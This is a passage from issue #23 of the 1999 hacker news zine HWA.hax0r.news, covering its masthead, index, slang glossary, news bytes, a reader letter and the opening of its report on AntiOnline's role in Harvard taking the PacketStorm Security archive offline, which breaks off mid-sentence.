[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 23 Volume 1 1999 July 4th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "I have received more death threats in the last 24 hours by phone, than I have in five years," - John Vranesevich aka JP (AntiOnline) HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://packetstorm.harvard.edu/hwahaxornews/ * DOWN * http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #23 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #23 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. AA.A .. SPECIAL: AntiOnline's JP pulls the plug on PacketStorm Security 03.0 .. Cable Modem Hijacking from www.hackcanada.com.................... 04.0 .. Exploiting Null Session Weaknesses in NT environment............. 05.0 .. Cognos PowerPlay Web Edition security vunerability allows access to data cubes.. 06.0 .. VMware Security Alert............................................ 07.0 .. Security vulnerability in hustler.com login template ............ 08.0 .. DOD investigating computer 'Mob-like' tactics.................... 09.0 .. GSA announces Intrusion Detection Net............................ 10.0 .. Nasa servers reportedly hacked................................... 11.0 .. UK May Force ISPs to Install Taps................................ 12.0 .. Crypto Tie Downs Loosened ....................................... 13.0 .. Heathen.A Spreads Through Word Files ........................... 14.0 .. $950 for a Log File Analysis Tool ............................... 15.0 .. Youth Charged With $20,000 in Damages ........................... 16.0 .. Army Fights Online Battle And Looses ............................ 17.0 .. Welfare Reform Law Invades Privacy of US Citizens .............. 18.0 .. GSM Mobile Security is Cracked .................................. 19.0 .. Microsoft Mono-culture Poses National Security Risk ............. 20.0 .. BugTraq Moves To SecurityFocus .................................. 21.0 .. MS Gives Out Pirate Dough ....................................... 22.0 .. Biometrics comes to Home Shopping ............................... 23.0 .. Palm VII Revealed ............................................... 24.0 .. Who Is HNN? ..................................................... 25.0 .. AntiOnline on the trail of f0rpaxe............................... 26.0 .. Critical NOAA Web Site Attacked ................................. 27.0 .. Back Orifice 2000 is on its Way ................................. 28.0 .. Support for Web Security Spec Announced ......................... 29.0 .. Pentagon Investigates Computer Security Breech .................. 30.0 .. What will the Next Generation of Viruses Bring? ................. 31.0 .. DIRT still Around, Used by LAw Enforcement ...................... 32.0 .. Debit Cards Not Safe on the Internet ............................ 33.0 .. New Definition of 'Computer Hacker' ............................. 34.0 .. Hackers In the Workplace ........................................ 35.0 .. NPR Covers .gov/.mil Defacements. ............................... 36.0 .. Australia Passes Major Net Censorship Law ....................... 37.0 .. Hacker crackdown, is your nick on this list?? ................... =--------------------------------------------------------------------------= RUMOURS .Rumours from around and about, mainly HNN stuff (not hacked websites) AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls .......................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://axon.jccc.net/hir/ Hackers Information Report Link http://net-security.org Net Security Link http://www.403-security.org Daily news and security related site Link Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security pr0xy Astral Ken Williams/tattooman of PacketStorm, hang in there Ken...:( and the #innerpulse, crew (innerpulse is back!) and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.securityfocus.com NEW + http://www.hackcanada.com + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN ********* SEE AA.A + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Help Net Security is Moving. contributed by BHZ Help-net Security, an HNN Affiliate is moving to a new server. Unfortunately they have encountered a few problems with transferring the domain. So net-security.org could be unfunctional for up to 5 days. In the mean time you can reach HNS at http://hns.crolink.net Help-net Security - Old URL http://net-security.org Help-net Security - New URL http://hns.crolink.net ++ TECHNO BRA CALLS THE COPS (TECH. 3:00 am Jul 1st) http://www.wired.com/news/news/email/explode-infobeat/technology/story/20517.html A security bra monitors the wearer's heart rate to sense danger. When activated, it relays her location to the cops and helps them make a bust. By Leander Kahney. ++ ALLEN BUYS ANOTHER CABLE SHOP (BUS. 9:00 am Jul 1st) http://www.wired.com/news/news/email/explode-infobeat/business/story/20528.html Paul Allen takes another step towards becoming master of his own "wired world" with the US$3.1 billion acquisition of Bresnan Communications, a Midwest cable operator. ++ WAITING FOR WAP (TECH. 3:00 am Jul 1st) http://www.wired.com/news/news/email/explode-infobeat/technology/story/20521.html Supporters say the Wireless Access Protocol promises to bring Web services to tiny cell-phone screens. But when? Chris Oakes reports from San Francisco. ++ APACHE NOW IN GOOD COMPANY (TECH. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/technology/story/20506.html The free Web server that has always had the lion's share of the market now has a corporation behind it. The nonprofit company is being run by Apache's founding fathers. ++ SORRY, WRONG NUMBER (WRLD Wednesday) http://www.wired.com/news/news/email/explode-infobeat/story/20509.html Manhattanites take pride in their 212 area code, a distinctive symbol of living in The Most Important Place on Earth. But starting Thursday, some of them are going to have to adjust to life without 212, when Bell Atlantic begins issuing 646 area codes to new phone subscribers in Manhattan. The move, necessitated by too many phone numbers, is not going down too well, although former New York Mayor Ed Koch expects the grousing to stop after an adjustment period. Besides, residents of Gotham will still hold on to all the other perks that make living there such a joy: astronomical rents, overpriced restaurants, and living cheek-by-jowl with one another. ++ ZEROING IN ON CELL-PHONE 911S (TECH. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/technology/story/20504.html New technology will pinpoint a mobile-phone user's location to within 5 feet -- a potential lifesaver in 911 calls. But watchdogs say the data will inevitably be within the reach of snoops. By Chris Oakes. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -=- From: "Whimsies & Company" To: Subject: Please support Justice and Free Speech Date: Thu, 1 Jul 1999 19:18:02 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Dark Modem DOWN For Emergency ACTION OK, two issues: 1) the following message has been sent to a TARGETED audience. We have walked a thin line between targeted mailing and spam. If we get even one complaint, we will stop. 2) It cannot be confirmed that any unusual activity has occurred on the antionline network in the past 24 hours *grin* therefore we have taken that statement out of the message. Again, we do NOT advocate spamming, we only want people who might be interested in this issue to be aware, so use DISCRETION when sending any mail. This is an emergency email message from Dark Modem (http://www.darkmodem.org). Yesterday (June 30, 1999), Packet Storm Security was taken offline after John Vranesevich sent an email to Harvard University about the JP section that was on the site. Some suspect it was really jealousy and animosity toward Ken Williams that drove JP to commit this offensive act. Packet Storm was in direct competition with antionline and essentially blew antionline out of the water in every category. It is this author's belief, therefore, that JP was trying to protect his "marketshare" (something that Ken Williams would never have done, since he was not in it for money). Please show your support by mentioning this topic on your website, forwarding this email to "whom it may concern", and sending email in support of Ken and PSS to Harvard and antionline. ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* *Otay buttwheat, here's #23 it might not be as bulging in the *pantal area as #22 but it should be a little cleaner (or not) *we've had some people coming into the IRC channel on EFNET and *just parting, maybe you're just scanning the nicks, but hey we *don't bite come and hang out, maybe chat about some of the shit *thats going down with Packetstorm or why 2600 is $7.15 in Canada *does Eric hate Canadians or whats the story? * *... who the fuck does JP think he is? fucking with PSS *there goes a ton of Ken's work down the drain...fuck AntiOnline! *(Read section AA.A) * *anyway enjoy this issue and shouts out to HackCanada..and Ken *Williams .. * * */ printf ("EoF.\n"); } Issue #23, rocking your sysadmin and hax0r asses in 99... Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA AA.A AntiOnline's JP causes the plug to be pulled on PacketStorm by Harvard ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th AM a Call from John Vranesevich (aka JP) of AntiOnline to Harvard started off an avalanche of events that culminated in the plug being pulled at packetstorm.harvard.edu. Along with personal data it was initially reported that the entire site was lost, this may now not be the case. Included here are statements from JP, Harvard, Ken Williams and stories from Attrition.org, HNN (http://www.hackernews.com) and other sources.... read the sordid story below - Ed (At this time it is uncertain wether Ken does or does not have backups of his PacketStorm site available to him but some people on the net have taken it upon themselves to begin a new mirror and are calling for people that have downloaded from the site to re-upload the files to the following url; http://packetstorm.nl.linux.org/ - Ed ) From: Ken Williams X-Sender: jkwilli2@ultra3-100lez.eos.ncsu.edu To: The Usual Suspects: ; Date: Thu, 1 Jul 1999 02:17:40 -0400 (EDT) -----BEGIN PGP SIGNED MESSAGE----- Hi, I just got off the phone (6/30/99 PM) with one of the Harvard Network managers. John Vranesevich, of www.AntiOnline.com, contacted Harvard this morning and threatened to sue them because of the content in the jp/ directory of the Packet Storm Security web site that was located at http://packetstorm.harvard.edu, and before that at http://packetstorm.genocide2600.com (see www.attrition.org for details about this info). I was told that the situation quickly escalated to the Harvard Office of General Counsel. John Vranesevich claims that I was using the server as a platform to harass and threaten him, his family, and his business. Nothing could be further from the truth. I ran a network security related web site and archive! The result: the server and the web site and it's contents are permanently offline, I have no access to even retrieve anything off of the server, the site known as "Packet Storm Security" is history now. I was told by Leo Donnelly at Harvard, via phone, that ALL of the content AND the backups made are either destroyed, being destroyed now, or will be before I can do anything to prevent it. All 4+ GB of files in the publicly accessible directories, over 45,000 files collected and archived over the years, are gone. There was another 4 GB that was composed of research data, customized IDS, Linux, Apache software, etc too. Harvard is facing a lawsuit from JP, I am facing a lawsuit from JP, and possibly some sort of legal action from Harvard. Harvard seems to be trying to free themselves of any liability, and use me as the fall guy for this whole thing. All agreements with Harvard in the beginning were verbal (with Jeff Gray, the senior sysadmin), so I've got nothing on paper to back up the truth. I've got emails, but I don't have the money or legal defense to counter Harvard, or anybody else for that matter. This has turned really ugly, really quickly, and it is very plausible that I will be facing charges involving "hacking" or computer crimes of some sort, because I "never had a Harvard ID, and thus was not authorized to use their facilities", and I "compromised their security." I guess it doesn't matter that I was contacted by the Senior Sysadmin at Harvard and invited to move my site there. It doesn't matter that the head of Harvard UIS approved of everything. It doesn't matter that he placed the box on a subnet of his choosing and called me and gave me the root password and told me I had free rein on the box. It doesn't matter that Harvard network security was never 